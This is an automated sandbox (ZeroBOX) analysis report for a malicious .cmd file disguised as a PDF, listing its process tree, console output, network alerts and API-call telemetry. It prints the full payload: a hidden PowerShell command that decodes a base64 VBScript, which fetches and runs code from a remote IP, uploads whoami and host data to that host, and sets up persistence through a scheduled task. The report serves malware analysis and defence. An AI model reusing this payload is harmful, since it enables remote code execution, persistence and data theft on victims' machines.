Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Dec. 14, 2023, 10:57 a.m.	Dec. 14, 2023, 10:59 a.m.

Size	1.4KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`0ebda52c2e35dd7d3088b5364a4583fd`
SHA256	`f5f269cf469bf9c9703fe0903cda100acbb4b3e13dbfef6b6ee87a907e5fcd1b`
CRC32	`B410FE1D`
ssdeep	`24:iinCTvkai1ZLUNZu8f4hdqIxLctItMCmFhAP9hjp8mBKC2WAzLQ1x5+zoWABczov:aXi1ZgO8fs/fNmFh06mB38Q1v+zoWAuY`
Yara	Antivirus - Contains references to security software

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "ntkaP" "C:\Users\test22\AppData\Local\Temp\481-5412-09.pdf .cmd"
2552
- cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Local\Temp\481-5412-09.pdf .cmd"
  2624
  - powershell.exe powershell.exe -w hidden -nop -noni -exec bypass -c $a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgJGlpaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cDovLzE0Ny43OC40Ni40MDozNzY2Mi9SY2ViS1J2YWludlFub2VTL3BhZ2UzMTEvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskYmpkbys9SUVYICRqa3J8b3V0LXN0cmluZztbYnl0ZVtdXSRkcnB5PVtzeXN0ZW0udGV4dC5lbmNvZGluZ106OlV0ZjguR2V0Qnl0ZXMoJGJqZG8pO307JHVqaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JHVqay51cGxvYWRkYXRhKCdodHRwOi8vMTQ3Ljc4LjQ2LjQwOjQzODkxL3BhZ2UzMTEnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\\Users\\Public\\Libraries\\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\\Users\\Public\\Libraries\\Libraries.vbs /f;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/office/1.pdf');set-content "$home\\appdata\local\\temp\\481-5412-09.pdf" -value $flm -Encoding byte;
    2712
    - schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\\Users\\Public\\Libraries\\Libraries.vbs /f
      2824

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
147.78.46.40	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49167 -> 147.78.46.40:37662	2027265	ET INFO Dotted Quad Host PDF Request	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 14, 2023, 10:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 14, 2023, 10:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:57 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 14, 2023, 10:57 a.m.			0	0

Command line console output was observed (30 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: powershell.exe console_handle: 0x00000007	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: -w hidden -nop -noni -exec bypass -c $a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgJGlpaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cDovLzE0Ny43OC40Ni40MDozNzY2Mi9SY2ViS1J2YWludlFub2VTL3BhZ2UzMTEvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskYmpkbys9SUVYICRqa3J8b3V0LXN0cmluZztbYnl0ZVtdXSRkcnB5PVtzeXN0ZW0udGV4dC5lbmNvZGluZ106OlV0ZjguR2V0Qnl0ZXMoJGJqZG8pO307JHVqaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JHVqay51cGxvYWRkYXRhKCdodHRwOi8vMTQ3Ljc4LjQ2LjQwOjQzODkxL3BhZ2UzMTEnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\\Users\\Public\\Libraries\\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\\Users\\Public\\Libraries\\Libraries.vbs /f;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/office/1.pdf');set-content "$home\\appdata\local\\temp\\481-5412-09.pdf" -value $flm -Encoding byte; console_handle: 0x00000007	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: $home\\appdata\local\\temp\\481-5412-09.pdf console_handle: 0x00000007	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The remote server retur console_handle: 0x00000023	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: ned an error: (404) Not Found." console_handle: 0x0000002f	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: At line:1 char:1232 console_handle: 0x0000003b	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: + $a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAic console_handle: 0x00000047	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: G93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUg console_handle: 0x00000053	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: LWMgJGlpaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR console_handle: 0x0000005f	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: 0cDovLzE0Ny43OC40Ni40MDozNzY2Mi9SY2ViS1J2YWludlFub2VTL3BhZ2UzMTEvdXBncmFkZS50eH console_handle: 0x0000006b	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: QnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4L console_handle: 0x00000077	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: mdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJw console_handle: 0x00000083	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: eT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV console_handle: 0x0000008f	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: 0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZT console_handle: 0x0000009b	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: skYmpkbys9SUVYICRqa3J8b3V0LXN0cmluZztbYnl0ZVtdXSRkcnB5PVtzeXN0ZW0udGV4dC5lbmNvZ console_handle: 0x000000a7	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: GluZ106OlV0ZjguR2V0Qnl0ZXMoJGJqZG8pO307JHVqaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7 console_handle: 0x000000b3	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: JHVqay51cGxvYWRkYXRhKCdodHRwOi8vMTQ3Ljc4LjQ2LjQwOjQzODkxL3BhZ2UzMTEnLCRkcnB5KTt console_handle: 0x000000bf	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: 9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg==';$b=[System.Convert]::FromBase64String($a);$c console_handle: 0x000000cb	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: =[System.Text.Encoding]::utf8.GetString($b);set-content C:\\Users\\Public\\Libr console_handle: 0x000000d7	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: aries\\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskM console_handle: 0x000000e3	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: achine /SC minute /mo 3 /tr C:\\Users\\Public\\Libraries\\Libraries.vbs /f;$iik console_handle: 0x000000ef	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: =new-object net.webclient;$flm=$iik.downloaddata <<<< ('http://147.78.46.40:376 console_handle: 0x000000fb	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: 62/office/1.pdf');set-content $home\\appdata\local\\temp\\481-5412-09.pdf -valu console_handle: 0x00000107	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: e $flm -Encoding byte; console_handle: 0x00000113	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000011f	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000012b	1	1
WriteConsoleW Dec. 14, 2023, 10:57 a.m.	buffer: SUCCESS: The scheduled task "ExplorerCoreUpdateTaskMachine" has successfully been created. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 51 events)

Time & API	Arguments	Status	Return
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002628e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002629e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002629e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002629e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002629e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002629e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002629e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002624a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002624a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002624a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002625e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00263268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00263268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00263268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00263268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00263268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00263268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00263268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00262768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 14, 2023, 10:57 a.m.		1	1	0

Powershell script has download & invoke calls (1 event)

Allocates read-write-execute memory (usually to unpack itself) (50 out of 152 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:57 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
